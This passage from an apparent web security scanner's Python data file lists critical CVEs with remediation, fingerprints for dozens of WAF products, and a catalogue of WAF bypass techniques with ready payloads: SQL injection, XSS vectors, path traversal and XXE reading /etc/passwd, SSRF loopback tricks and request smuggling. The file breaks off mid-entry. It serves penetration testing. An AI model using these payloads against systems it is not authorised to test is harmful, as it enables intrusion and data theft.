    {"id":"CVE-2020-1472","name":"Zerologon Netlogon Privilege Escalation CVSS 10","year":2020,"severity":"CRITICAL","cvss":10.0,"affected":["windows","active directory","netlogon"],"indicators":["windows","active directory","microsoft-iis"],"description":"Escalada crítica via Netlogon. Compromete AD Domain Controller sem credenciais.","remediation":"Aplicar patches MS de Agosto 2020. Habilitar Secure Netlogon mandatory.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-1472"]},
    {"id":"CVE-2020-0796","name":"SMBGhost Windows SMBv3 Wormable RCE CVSS 10","year":2020,"severity":"CRITICAL","cvss":10.0,"affected":["windows","smb","smbv3"],"indicators":["windows","smb"],"description":"Integer overflow no SMBv3. Wormable RCE pré-autenticação.","remediation":"Aplicar KB4551762. Desabilitar compressão SMB.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-0796"]},
    {"id":"CVE-2020-5902","name":"F5 BIG-IP TMUI Path Traversal RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["big-ip","f5","tmui"],"indicators":["big-ip","f5","tmui"],"description":"RCE via path traversal no TMUI do F5 BIG-IP. Sem autenticação.","remediation":"Atualizar BIG-IP imediatamente.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-5902"]},
    {"id":"CVE-2020-1938","name":"Ghostcat Apache Tomcat AJP File Inclusion RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["tomcat","apache tomcat","apache-coyote"],"indicators":["tomcat","apache-coyote","jserv","apache tomcat"],"description":"Inclusão de arquivo arbitrário via conector AJP do Tomcat (porta 8009 padrão).","remediation":"Desabilitar AJP connector ou atualizar Tomcat >= 9.0.31.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-1938"]},
    {"id":"CVE-2020-14882","name":"Oracle WebLogic Console Authentication Bypass RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["weblogic","oracle weblogic"],"indicators":["weblogic","oracle weblogic","wls"],"description":"RCE não autenticado no console admin do Oracle WebLogic via path traversal.","remediation":"Aplicar CPU Oracle de Outubro 2020.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-14882"]},
    {"id":"CVE-2020-15505","name":"MobileIron MDM Unauthenticated RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["mobileiron","ivanti mobileiron"],"indicators":["mobileiron"],"description":"RCE não autenticado no MobileIron Core/Connector. Explorado por APTs chineses e iranianos.","remediation":"Atualizar MobileIron Core >= 10.6.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-15505"]},
    {"id":"CVE-2020-10189","name":"Zoho ManageEngine Desktop Central Deserialization RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["manageengine","desktop central","zoho"],"indicators":["manageengine","desktop central","zoho"],"description":"RCE via desserialização insegura no ManageEngine Desktop Central.","remediation":"Atualizar para build 10.0.479.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-10189"]},
    {"id":"CVE-2020-0601","name":"CurveBall Windows CryptoAPI ECC Certificate Spoofing","year":2020,"severity":"HIGH","cvss":8.1,"affected":["windows","cryptoapi"],"indicators":["windows","microsoft-iis","iis"],"description":"Spoofing de certificados ECC via validação incorreta de curvas elípticas no Windows CryptoAPI.","remediation":"Aplicar patches MS de Janeiro 2020 (KB4528760).","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-0601"]},
    {"id":"CVE-2020-3452","name":"Cisco ASA FTD WebVPN Path Traversal","year":2020,"severity":"HIGH","cvss":7.5,"affected":["cisco asa","cisco ftd","firepower"],"indicators":["cisco asa","cisco ftd"],"description":"Path traversal no WebVPN do Cisco ASA/FTD. Leitura de arquivos arbitrários.","remediation":"Aplicar patches Cisco de Julho 2020.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-3452"]},
    {"id":"CVE-2020-12812","name":"FortiOS SSL-VPN Case Insensitive Auth Bypass","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["fortios","fortigate","fortinet"],"indicators":["fortios","fortigate","fortinet"],"description":"Bypass de autenticação no SSL-VPN do FortiOS via alteração de case no username.","remediation":"Atualizar FortiOS >= 6.4.1, 6.2.4.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-12812"]},
    {"id":"CVE-2020-25213","name":"WordPress File Manager Plugin Unauthenticated RCE","year":2020,"severity":"CRITICAL","cvss":10.0,"affected":["wordpress","file manager plugin"],"indicators":["wordpress","wp-content","wp-includes"],"description":"RCE não autenticado no plugin WP File Manager <= 6.8. 700k+ sites explorados.","remediation":"Atualizar WP File Manager >= 6.9.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-25213"]},
    {"id":"CVE-2020-17530","name":"Apache Struts 2 OGNL Double Evaluation RCE","year":2020,"severity":"CRITICAL","cvss":9.8,"affected":["struts","struts2"],"indicators":["struts","struts2"],"description":"RCE via dupla avaliação OGNL em atributos de tags do Struts 2.","remediation":"Atualizar Struts >= 2.5.26.","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-17530"]},
    {"id": "CVE-2025-21298", "name": "Windows OLE Remote Code Execution", "year": 2025, "severity": "CRITICAL", "cvss": 9.8, "affected": ["windows", "ole"], "indicators": ["windows", "microsoft-iis"], "description": "RCE via Windows OLE (Object Linking and Embedding) ao processar arquivos crafted. Zero-day explorado em Patch Tuesday de Janeiro 2025.", "remediation": "Aplicar patches MS de Janeiro 2025.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2025-21298"]},
    {"id": "CVE-2025-24054", "name": "Windows NTLM Hash Leakage Spoofing", "year": 2025, "severity": "HIGH", "cvss": 8.8, "affected": ["windows", "ntlm"], "indicators": ["windows", "microsoft-iis"], "description": "Spoofing com vazamento de hash NTLM no Windows. Um arquivo .library-ms malicioso pode disparar autenticação NTLM.", "remediation": "Aplicar patches MS de Março 2025.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2025-24054"]},
    {"id": "CVE-2025-26633", "name": "Windows MMC Zero-Day RCE (EncryptHub)", "year": 2025, "severity": "HIGH", "cvss": 7.0, "affected": ["windows", "mmc"], "indicators": ["windows", "microsoft-iis"], "description": "Zero-day no Microsoft Management Console explorado pelo grupo EncryptHub para RCE.", "remediation": "Aplicar patches MS de Março 2025.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2025-26633"]},
    {"id": "CVE-2024-26169", "name": "Windows Error Reporting Service Privilege Escalation", "year": 2024, "severity": "HIGH", "cvss": 7.8, "affected": ["windows"], "indicators": ["windows", "microsoft-iis"], "description": "Escalada de privilégios no Windows Error Reporting Service. Explorado antes do patch público.", "remediation": "Aplicar patches MS de Março 2024.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2024-26169"]},
    {"id": "CVE-2024-20656", "name": "VSS Volume Shadow Copy Privilege Escalation", "year": 2024, "severity": "HIGH", "cvss": 7.8, "affected": ["windows", "vss"], "indicators": ["windows", "microsoft-iis"], "description": "Escalada de privilégios no serviço VSS do Windows. Permite execução de código com SYSTEM privileges.", "remediation": "Aplicar patches MS de Janeiro 2024.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2024-20656"]},
    {"id": "CVE-2024-29988", "name": "Windows SmartScreen Security Bypass", "year": 2024, "severity": "HIGH", "cvss": 8.8, "affected": ["windows", "smartscreen"], "indicators": ["windows", "microsoft-iis"], "description": "Bypass do Windows SmartScreen Protection. Explorado ativamente em campanhas de phishing.", "remediation": "Aplicar patches MS de Abril 2024.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2024-29988"]},
    {"id": "CVE-2024-21413", "name": "Microsoft Outlook RCE via Preview Pane", "year": 2024, "severity": "CRITICAL", "cvss": 9.8, "affected": ["outlook", "microsoft outlook"], "indicators": ["outlook", "microsoft outlook", "exchange"], "description": "RCE no Microsoft Outlook ao visualizar email com hiperlink crafted. Moniker Link bypass da Protected View.", "remediation": "Aplicar patches MS de Fevereiro 2024.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2024-21413"]},
    {"id": "CVE-2024-0012", "name": "PAN-OS Management Interface Authentication Bypass", "year": 2024, "severity": "CRITICAL", "cvss": 9.3, "affected": ["panos", "pan-os", "palo alto"], "indicators": ["globalprotect", "pan-os", "palo alto networks"], "description": "Bypass de autenticação na interface de gerenciamento do PAN-OS sem credenciais. Explorado como zero-day.", "remediation": "Aplicar patches Palo Alto de Novembro 2024.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2024-0012"]},
    {"id": "CVE-2023-28252", "name": "Windows CLFS Privilege Escalation Nokoyawa", "year": 2023, "severity": "HIGH", "cvss": 7.8, "affected": ["windows", "clfs"], "indicators": ["windows", "microsoft-iis"], "description": "Escalada de privilégios no Windows CLFS Driver. Explorado pelo ransomware Nokoyawa como zero-day.", "remediation": "Aplicar patches MS de Abril 2023.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2023-28252"]},
    {"id": "CVE-2023-24880", "name": "Windows SmartScreen Security Bypass", "year": 2023, "severity": "MEDIUM", "cvss": 6.1, "affected": ["windows", "smartscreen"], "indicators": ["windows", "microsoft-iis"], "description": "Bypass do Windows SmartScreen. Explorado pelo grupo Magniber em distribuição de ransomware.", "remediation": "Aplicar patches MS de Março 2023.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2023-24880"]},
    {"id": "CVE-2022-24521", "name": "Windows CLFS Privilege Escalation", "year": 2022, "severity": "HIGH", "cvss": 7.8, "affected": ["windows", "clfs"], "indicators": ["windows", "microsoft-iis"], "description": "Escalada de privilégios no Windows Common Log File System Driver. Explorado ativamente como zero-day.", "remediation": "Aplicar patches MS de Abril 2022.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2022-24521"]},
    {"id": "CVE-2022-30216", "name": "Windows Server Service Tampering", "year": 2022, "severity": "HIGH", "cvss": 8.8, "affected": ["windows", "server service"], "indicators": ["windows", "microsoft-iis"], "description": "Adulteração do Windows Server Service permite escalada para SYSTEM. Exploitável em rede.", "remediation": "Aplicar patches MS de Julho 2022.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2022-30216"]},
    {"id": "CVE-2022-34718", "name": "Windows TCP/IP Remote Code Execution", "year": 2022, "severity": "CRITICAL", "cvss": 9.8, "affected": ["windows", "tcp/ip"], "indicators": ["windows", "microsoft-iis"], "description": "RCE wormable via pilha TCP/IP do Windows em sistemas com IPv6 habilitado.", "remediation": "Aplicar patches MS de Setembro 2022.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2022-34718"]},
    {"id": "CVE-2021-36942", "name": "Windows LSA Spoofing (PetitPotam)", "year": 2021, "severity": "HIGH", "cvss": 9.8, "affected": ["windows", "lsa", "active directory"], "indicators": ["windows", "active directory", "microsoft-iis"], "description": "NTLM relay via PetitPotam. Força domain controllers a autenticar para servidores controlados pelo atacante.", "remediation": "Aplicar patches MS de Agosto 2021.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2021-36942"]},
    {"id": "CVE-2021-33766", "name": "Microsoft Exchange ProxyToken Auth Bypass", "year": 2021, "severity": "HIGH", "cvss": 7.3, "affected": ["exchange", "microsoft exchange"], "indicators": ["exchange", "microsoft exchange", "owa"], "description": "Bypass de autenticação no Exchange Server via token de sessão frontendrm. Permite acesso a funcionalidades administrativas.", "remediation": "Aplicar patches MS de Julho 2021.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2021-33766"]},
    {"id": "CVE-2021-28482", "name": "Microsoft Exchange Post-Auth RCE", "year": 2021, "severity": "HIGH", "cvss": 8.8, "affected": ["exchange", "microsoft exchange"], "indicators": ["exchange", "microsoft exchange", "owa"], "description": "RCE pós-autenticação no Microsoft Exchange Server. Parte do conjunto de vulnerabilidades ProxyToken.", "remediation": "Aplicar patches MS de Abril 2021.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2021-28482"]},
    {"id": "CVE-2020-16875", "name": "Microsoft Exchange Memory Corruption RCE", "year": 2020, "severity": "CRITICAL", "cvss": 9.1, "affected": ["exchange", "microsoft exchange"], "indicators": ["exchange", "microsoft exchange", "owa"], "description": "RCE via corrupção de memória no Exchange Server ao processar cmdlets PowerShell crafted. Requer autenticação básica.", "remediation": "Aplicar patches MS de Setembro 2020.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-16875"]},
    {"id": "CVE-2020-0688", "name": "Microsoft Exchange Static Cryptographic Key RCE", "year": 2020, "severity": "HIGH", "cvss": 8.8, "affected": ["exchange", "microsoft exchange"], "indicators": ["exchange", "microsoft exchange", "owa", "ecp"], "description": "RCE no Exchange Server via ViewState com chave criptográfica estática. Autenticação requerida.", "remediation": "Aplicar patches MS de Fevereiro 2020.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-0688"]},
    {"id": "CVE-2020-7961", "name": "Liferay Portal Java Deserialization RCE", "year": 2020, "severity": "CRITICAL", "cvss": 9.8, "affected": ["liferay", "liferay portal"], "indicators": ["liferay", "portal"], "description": "RCE via desserialização Java insegura no Liferay Portal. Sem autenticação via JSON Web Services API.", "remediation": "Atualizar Liferay Portal >= 7.2 CE GA2.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-7961"]},
    {"id": "CVE-2020-2555", "name": "Oracle Coherence Deserialization RCE", "year": 2020, "severity": "CRITICAL", "cvss": 9.8, "affected": ["oracle coherence", "weblogic"], "indicators": ["weblogic", "oracle weblogic", "coherence"], "description": "RCE via desserialização insegura no Oracle Coherence. Exploitável sem autenticação via T3 protocol.", "remediation": "Aplicar CPU Oracle de Janeiro 2020.", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2020-2555"]},
]


WAF_SIGNATURES = {
    "Cloudflare": {"headers":["cf-ray","cf-cache-status","cf-request-id","cf-connecting-ip","cf-ipcountry"],"cookies":["__cflb","__cfduid","__cf_bm","cf_clearance"],"body_patterns":["cloudflare","Attention Required! | Cloudflare","CF-RAY"],"status_on_block":[403,503,429],"vendor":"Cloudflare Inc.","type":"Cloud WAF"},
    "AWS WAF": {"headers":["x-amzn-requestid","x-amz-cf-id","x-amz-id-2","x-amzn-trace-id"],"cookies":["aws-waf-token","awsalb","awsalbcors"],"body_patterns":["Request blocked","aws-waf"],"status_on_block":[403,405],"vendor":"Amazon Web Services","type":"Cloud WAF"},
    "ModSecurity": {"headers":["mod_security","modsecurity","x-modsec-score"],"cookies":[],"body_patterns":["ModSecurity","Not Acceptable","generated by Mod_Security"],"status_on_block":[403,406],"vendor":"Trustwave / OWASP","type":"Open Source WAF"},
    "Imperva / Incapsula": {"headers":["x-iinfo","x-cdn","x-cdn-forward"],"cookies":["visid_incap","incap_ses","_incap_"],"body_patterns":["incapsula","Incapsula incident","_Incapsula_Resource"],"status_on_block":[403,503],"vendor":"Imperva","type":"Cloud WAF"},
    "Akamai": {"headers":["x-akamai-transformed","akamai-origin-hop","x-check-cacheable"],"cookies":["ak_bmsc","bm_sz","bm_sv","_abck"],"body_patterns":["akamai","AkamaiGHost","Reference #"],"status_on_block":[403,503],"vendor":"Akamai Technologies","type":"Cloud WAF / CDN"},
    "F5 BIG-IP ASM": {"headers":["x-wa-info","x-cnection","bigipserver","x-f5-dr"],"cookies":["ts","f5avr","f5_fullpage","f5_cspm"],"body_patterns":["The requested URL was rejected","F5 Networks"],"status_on_block":[403],"vendor":"F5 Networks","type":"On-premise WAF"},
    "Sucuri": {"headers":["x-sucuri-id","x-sucuri-cache","x-sucuri-block"],"cookies":["sucuri_cloudproxy_uuid"],"body_patterns":["sucuri","Access Denied - Sucuri Website Firewall"],"status_on_block":[403],"vendor":"Sucuri / GoDaddy","type":"Cloud WAF"},
    "Barracuda WAF": {"headers":["barra_counter_session","x-barracuda-start-time"],"cookies":["barra_counter_session"],"body_patterns":["barracuda","You have been blocked","Barracuda Web Application Firewall"],"status_on_block":[403],"vendor":"Barracuda Networks","type":"On-premise / Cloud WAF"},
    "Wordfence": {"headers":[],"cookies":["wfvt_","wordfence_verifiedHuman"],"body_patterns":["wordfence","generated by wordfence","Wordfence Security"],"status_on_block":[403],"vendor":"Defiant Inc.","type":"WordPress WAF Plugin"},
    "Fortinet FortiWeb": {"headers":["x-waf-event-info","fortiwafsid"],"cookies":["FORTIWAFSID"],"body_patterns":["fortiweb","FortiWeb"],"status_on_block":[403],"vendor":"Fortinet","type":"On-premise WAF"},
    "Citrix NetScaler AppFW": {"headers":["x-citrix-nsapplication","via: NS-CACHE"],"cookies":["NSC_","citrix_ns_id"],"body_patterns":["NetScaler","Citrix Systems"],"status_on_block":[403],"vendor":"Citrix Systems","type":"On-premise WAF"},
    "Palo Alto NGFW": {"headers":["x-pan-","pan-os"],"cookies":[],"body_patterns":["Palo Alto Networks","pan-appliance"],"status_on_block":[403,503],"vendor":"Palo Alto Networks","type":"NGFW WAF"},
    "Radware AppWall": {"headers":["x-sl-compstate","rdwr"],"cookies":["rdwr"],"body_patterns":["Radware","AppWall","rdwr_cookie"],"status_on_block":[403],"vendor":"Radware","type":"On-premise WAF"},
    "Wallarm": {"headers":["x-wallarm-node-uuid"],"cookies":[],"body_patterns":["wallarm","Wallarm"],"status_on_block":[403],"vendor":"Wallarm Inc.","type":"Cloud / Hybrid WAF"},
    "Reblaze": {"headers":["x-reblaze-protection"],"cookies":["rbzid","rbzsessionid"],"body_patterns":["reblaze","Reblaze"],"status_on_block":[403],"vendor":"Reblaze Technologies","type":"Cloud WAF"},
    "StackPath": {"headers":["x-sp-url","x-sp-waf"],"cookies":[],"body_patterns":["StackPath","Access Denied | StackPath"],"status_on_block":[403],"vendor":"StackPath","type":"Cloud WAF / CDN"},
    "Alibaba Cloud WAF": {"headers":["ali-cdn-real-ip","x-swift-savetime"],"cookies":["acw_tc"],"body_patterns":["Alibaba","alicdn","aliyun"],"status_on_block":[405,403],"vendor":"Alibaba Cloud","type":"Cloud WAF"},
    "Tencent Cloud WAF": {"headers":["x-client-ip","x-from-cdn"],"cookies":[],"body_patterns":["Tencent","qcloud","blocked by Tencent"],"status_on_block":[403],"vendor":"Tencent Cloud","type":"Cloud WAF"},
    "Huawei Cloud WAF": {"headers":["x-hws-err","x-hws-mediation"],"cookies":[],"body_patterns":["Huawei","HuaweiCloud"],"status_on_block":[403],"vendor":"Huawei Technologies","type":"Cloud WAF"},
    "Fastly WAF / Signal Sciences": {"headers":["x-sigsci-tags","x-sigsci-requestid","fastly-restarts"],"cookies":[],"body_patterns":["Signal Sciences","Fastly WAF"],"status_on_block":[406],"vendor":"Fastly / Signal Sciences","type":"Cloud WAF"},
    "Microsoft Azure WAF": {"headers":["x-azure-ref","x-azure-requestid"],"cookies":[],"body_patterns":["Azure Web Application Firewall","Microsoft Azure"],"status_on_block":[403],"vendor":"Microsoft Azure","type":"Cloud WAF"},
    "Google Cloud Armor": {"headers":["x-google-abuse-policy"],"cookies":[],"body_patterns":["Google Cloud Armor","The page you requested was blocked"],"status_on_block":[403,404],"vendor":"Google Cloud","type":"Cloud WAF"},
    "SonicWall": {"headers":["x-sonicwall-"],"cookies":[],"body_patterns":["SonicWall","SonicWALL","This site has been blocked"],"status_on_block":[403],"vendor":"SonicWall Inc.","type":"On-premise WAF / NGFW"},
    "Juniper Networks WAF": {"headers":["x-juniper-"],"cookies":[],"body_patterns":["Juniper Networks","JNPR-"],"status_on_block":[403],"vendor":"Juniper Networks","type":"On-premise NGFW"},
    "NAXSI (Nginx WAF)": {"headers":["x-data-origin"],"cookies":[],"body_patterns":["NAXSI","nginx NAXSI"],"status_on_block":[418,403],"vendor":"NBS System","type":"Nginx WAF Module"},
    "Comodo WAF": {"headers":["x-comodo-waf-id"],"cookies":[],"body_patterns":["Comodo WAF","Comodo Web Application Firewall"],"status_on_block":[403],"vendor":"Comodo Security","type":"Cloud WAF"},
    "Kona Site Defender (Akamai)": {"headers":["x-akamai-transformed","server: AkamaiGHost"],"cookies":["ak_bmsc","_abck"],"body_patterns":["AkamaiGHost","Access Denied"],"status_on_block":[403],"vendor":"Akamai Technologies","type":"Cloud WAF Enterprise"},
    "Varnish Cache / Fastly": {"headers":["x-varnish","x-served-by","fastly-debug-digest"],"cookies":[],"body_patterns":["Varnish cache server","Error 503"],"status_on_block":[503],"vendor":"Fastly / Varnish Software","type":"CDN / Cache WAF"},
    "Nginx ModSecurity (OWASP CRS)": {"headers":["server: nginx"],"cookies":[],"body_patterns":["blocked by nginx ModSecurity","OWASP CRS"],"status_on_block":[403],"vendor":"Nginx + ModSecurity + OWASP","type":"Open Source WAF"},
    "OpenResty / LuaJIT WAF": {"headers":["server: openresty"],"cookies":[],"body_patterns":["openresty","LuaJIT","OpenResty"],"status_on_block":[403],"vendor":"OpenResty Inc.","type":"Open Source WAF"},
}

# ══════════════════════════════════════════════════════════════════════
# 30 TÉCNICAS DE BYPASS — POLÍTICA ANTI-FALSO-POSITIVO
#
# REGRAS DE CLASSIFICAÇÃO NO ENGINE:
#   BYPASS     → HTTP 200..299 E body NÃO contém padrões de bloqueio WAF
#   BLOQUEADO  → HTTP 403, 406, 429, 503, 418
#   REDIRECT   → HTTP 301, 302, 307, 308 (NÃO é bypass)
#   NOT_FOUND  → HTTP 404 (endpoint inexistente — NÃO é bypass)
#   PARCIAL    → HTTP 400, 405, 500, 502 (resposta anômala, revisar manualmente)
#   ERROR      → Timeout ou erro de conexão
# ══════════════════════════════════════════════════════════════════════

WAF_BYPASS_TECHNIQUES = [
    {
        "name": "Null Byte SQL Injection",
        "technique": "null_byte_sqli",
        "payload": "1%00' OR '1'='1",
        "category": "SQLi",
        "description": "Byte nulo (%00) quebra o token antes do payload. Parsers C/C++ do WAF interpretam como fim de string e não analisam o restante.",
        "effectiveness": "Alta contra ModSecurity legado e WAFs com parsers em C",
    },
    {
        "name": "Double URL Encoding",
        "technique": "double_url_encoding",
        "payload": "%2527%2520OR%25201%253D1",
        "category": "SQLi / XSS",
        "description": "Codifica a URL duas vezes. WAF decodifica uma vez e não reconhece; a aplicação decodifica duas vezes e executa o payload.",
        "effectiveness": "Média-alta contra WAFs cloud sem double-decode",
    },
    {
        "name": "SQL Keyword Case Variation",
        "technique": "case_variation_sqli",
        "payload": "SeLeCt+UsEr()+FrOm+dUaL",
        "category": "SQLi",
        "description": "Alterna maiúsculas/minúsculas em palavras-chave SQL para bypassar regras case-sensitive.",
        "effectiveness": "Média contra WAFs sem normalização de case",
    },
    {
        "name": "SQL Inline Comment Fragmentation",
        "technique": "sql_comment_frag",
        "payload": "SE/**/LE/**/CT+1,2,3--",
        "category": "SQLi",
        "description": "Comentários SQL inline (/**/) fragmentam tokens. Bypassa regras de matching por palavra completa.",
        "effectiveness": "Alta contra regras simples de keyword matching",
    },
    {
        "name": "MySQL Conditional Comment Evasion",
        "technique": "mysql_conditional_comment",
        "payload": "/*!50000SELECT*/+1,2,3--",
        "category": "SQLi",
        "description": "Comentário condicional MySQL (/*!NNNN*/). WAF vê comentário; MySQL executa como SQL.",
        "effectiveness": "Alta especificamente contra alvos com MySQL",
    },
    {
        "name": "Unicode UTF-8 IIS Notation",
        "technique": "unicode_iis_notation",
        "payload": "%u0053%u0045%u004C%u0045%u0043%u0054",
        "category": "SQLi / XSS",
        "description": "Notation Unicode IIS (%uXXXX). WAFs sem suporte a decode Unicode não reconhecem o payload.",
        "effectiveness": "Alta em IIS/ASP.NET com WAFs desatualizados",
    },
    {
        "name": "XSS HTML Entity Decimal Encoding",
        "technique": "xss_html_entity_decimal",
        "payload": "&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert(1)&#60;&#47;script&#62;",
        "category": "XSS",
        "description": "Tags HTML codificadas como entidades decimais. Browser renderiza; WAF não reconhece a tag.",
        "effectiveness": "Alta contra WAFs sem decode de entidades HTML",
    },
    {
        "name": "XSS SVG onload Backtick Bypass",
        "technique": "xss_svg_backtick",
        "payload": "<svg/onload=alert`1`>",
        "category": "XSS",
        "description": "Tag SVG com onload sem espaço e backticks no lugar de parênteses. Bypassa regras de padrão on[event]=().",
        "effectiveness": "Média-alta quando WAF não bloqueia SVG",
    },
    {
        "name": "XSS JavaScript Protocol href",
        "technique": "xss_javascript_href",
        "payload": "<a+href=javascript:alert(1)>click",
        "category": "XSS",
        "description": "Protocolo javascript: em atributo href. Não usa script tag; bypassa WAFs focados em <script>.",
        "effectiveness": "Média; depende de reflexão em atributos href",
    },
    {
        "name": "XSS IMG onerror Polyglot",
        "technique": "xss_img_onerror",
        "payload": "<img+src=x+onerror=alert(1)//>",
        "category": "XSS",
        "description": "IMG com src inválido dispara onerror. Sem script tag, bypassa filtros focados em <script>.",
        "effectiveness": "Média contra WAFs focados em tags script",
    },
    {
        "name": "Path Traversal Double URL Encoding",
        "technique": "path_traversal_double_encode",
        "payload": "..%252F..%252F..%252Fetc%252Fpasswd",
        "category": "LFI / Path Traversal",
        "description": "Barra codificada como %2F depois como %252F. Aplicação decodifica duas vezes: ../../etc/passwd.",
        "effectiveness": "Alta em apps com múltiplos níveis de URL decode",
    },
    {
        "name": "Path Traversal Unicode Overlong Slash",
        "technique": "path_traversal_unicode_slash",
        "payload": "..%c0%af..%c0%afetc%c0%afpasswd",
        "category": "LFI / Path Traversal",
        "description": "Barra como sequência UTF-8 inválida %c0%af (overlong encoding). Explorado no CVE-2001-0131.",
        "effectiveness": "Alta em servidores Java/Tomcat sem validação unicode",
    },
    {
        "name": "Path Traversal Encoded Dot-Dot",
        "technique": "path_traversal_encoded_dotdot",
        "payload": "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "category": "LFI / Path Traversal",
        "description": "Dot-dot-slash completamente codificado. WAFs que não normalizam antes de checar são bypassados.",
        "effectiveness": "Média; eficaz em WAFs sem URL normalization",
    },
    {
        "name": "HTTP Header IP Spoof via X-Forwarded-For",
        "technique": "ip_spoof_xff",
        "payload": "X-Forwarded-For: 127.0.0.1",
        "category": "WAF Evasion / IP Bypass",
        "description": "Injeta XFF com IP de loopback. WAFs/apps que confiam neste header liberam a requisição.",
        "effectiveness": "Alta quando app usa X-Forwarded-For sem validação",
    },
    {
        "name": "HTTP Header IP Spoof via X-Real-IP",
        "technique": "ip_spoof_xrealip",
        "payload": "X-Real-IP: 127.0.0.1",
        "category": "WAF Evasion / IP Bypass",
        "description": "Injeta X-Real-IP com IP de loopback. Alternativa ao XFF em configurações Nginx.",
        "effectiveness": "Alta em ambientes Nginx com trusted_proxy mal configurado",
    },
    {
        "name": "Chunked Transfer Encoding Fragmentation",
        "technique": "chunked_fragmentation",
        "payload": "Transfer-Encoding: chunked [payload fragmentado em chunks]",
        "category": "WAF Evasion",
        "description": "Fragmenta payload em múltiplos chunks HTTP. WAFs sem reassembly correto não reconstituem o ataque.",
        "effectiveness": "Alta contra WAFs sem reassembly de chunked encoding",
    },
    {
        "name": "HTTP Request Smuggling TE-CL",
        "technique": "smuggling_tecl",
        "payload": "Transfer-Encoding: chunked + Content-Length: N conflitantes",
        "category": "Request Smuggling",
        "description": "Conflito entre Transfer-Encoding e Content-Length engana o proxy/WAF sobre os limites das requisições.",
        "effectiveness": "Alta em setups com WAF na frente de servidor de aplicação",
    },
    {
        "name": "HTTP Request Smuggling CL-TE",
        "technique": "smuggling_clte",
        "payload": "Content-Length grande + Transfer-Encoding: chunked no backend",
        "category": "Request Smuggling",
        "description": "Variante CL-TE. Frontend usa CL; backend usa TE, criando janela de injeção.",
        "effectiveness": "Alta em load balancers e proxies reversos heterogêneos",
    },
    {
        "name": "JSON Content-Type SQLi Bypass",
        "technique": "json_contenttype_bypass",
        "payload": "Content-Type: application/json {\"id\":\"1 OR 1=1\"}",
        "category": "SQLi / NoSQLi",
        "description": "Envia payload em JSON. WAFs configurados apenas para form-urlencoded ou XML ignoram o body.",
        "effectiveness": "Alta em WAFs com parsing seletivo por Content-Type",
    },
    {
        "name": "Multipart Boundary Injection",
        "technique": "multipart_boundary",
        "payload": "Content-Type: multipart/form-data; boundary=INJECT com payload no campo name",
        "category": "WAF Evasion",
        "description": "Injeta payload no nome do campo de multipart. Parsers WAF frequentemente não inspecionam nomes de campo.",
        "effectiveness": "Média-alta em uploads de arquivos e formulários multipart",
    },
    {
        "name": "SSRF via DNS Rebinding",
        "technique": "ssrf_dns_rebinding",
        "payload": "URL com DNS controlado que rebinda para 127.0.0.1 após check WAF",
        "category": "SSRF",
        "description": "DNS controlado resolve para IP permitido inicialmente, depois rebinda para IP interno após validação do WAF.",
        "effectiveness": "Alta quando WAF valida hostname mas não re-resolve DNS",
    },
    {
        "name": "SSRF via IPv6 Loopback",
        "technique": "ssrf_ipv6",
        "payload": "http://[::1]/admin",
        "category": "SSRF",
        "description": "IPv6 loopback (::1) para contornar filtros baseados apenas em IPv4 (127.0.0.1).",
        "effectiveness": "Média; eficaz quando WAF filtra 127.0.0.1 mas não ::1",
    },
    {
        "name": "SSRF via Decimal IP Notation",
        "technique": "ssrf_decimal_ip",
        "payload": "http://2130706433/ (127.0.0.1 em decimal)",
        "category": "SSRF",
        "description": "IP 127.0.0.1 representado como inteiro decimal (2130706433). Bypass de filtros simples.",
        "effectiveness": "Média; eficaz em filtros SSRF sem normalização de IP",
    },
    {
        "name": "GraphQL Alias Introspection Bypass",
        "technique": "graphql_alias_bypass",
        "payload": "{__schema{types{name}}} com field aliasing para evasão de rate limit",
        "category": "GraphQL / API Abuse",
        "description": "WAFs raramente inspecionam payload GraphQL em profundidade. Aliasing e batching são exploráveis.",
        "effectiveness": "Alta em APIs GraphQL sem WAF especializado",
    },
    {
        "name": "XXE via SVG Upload",
        "technique": "xxe_svg_upload",
        "payload": "SVG com <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
        "category": "XXE / LFI",
        "description": "XXE dentro de arquivo SVG processado server-side. WAFs raramente inspecionam uploads de imagem.",
        "effectiveness": "Alta em apps que processam SVGs server-side",
    },
    {
        "name": "XXE via XLSX Upload",
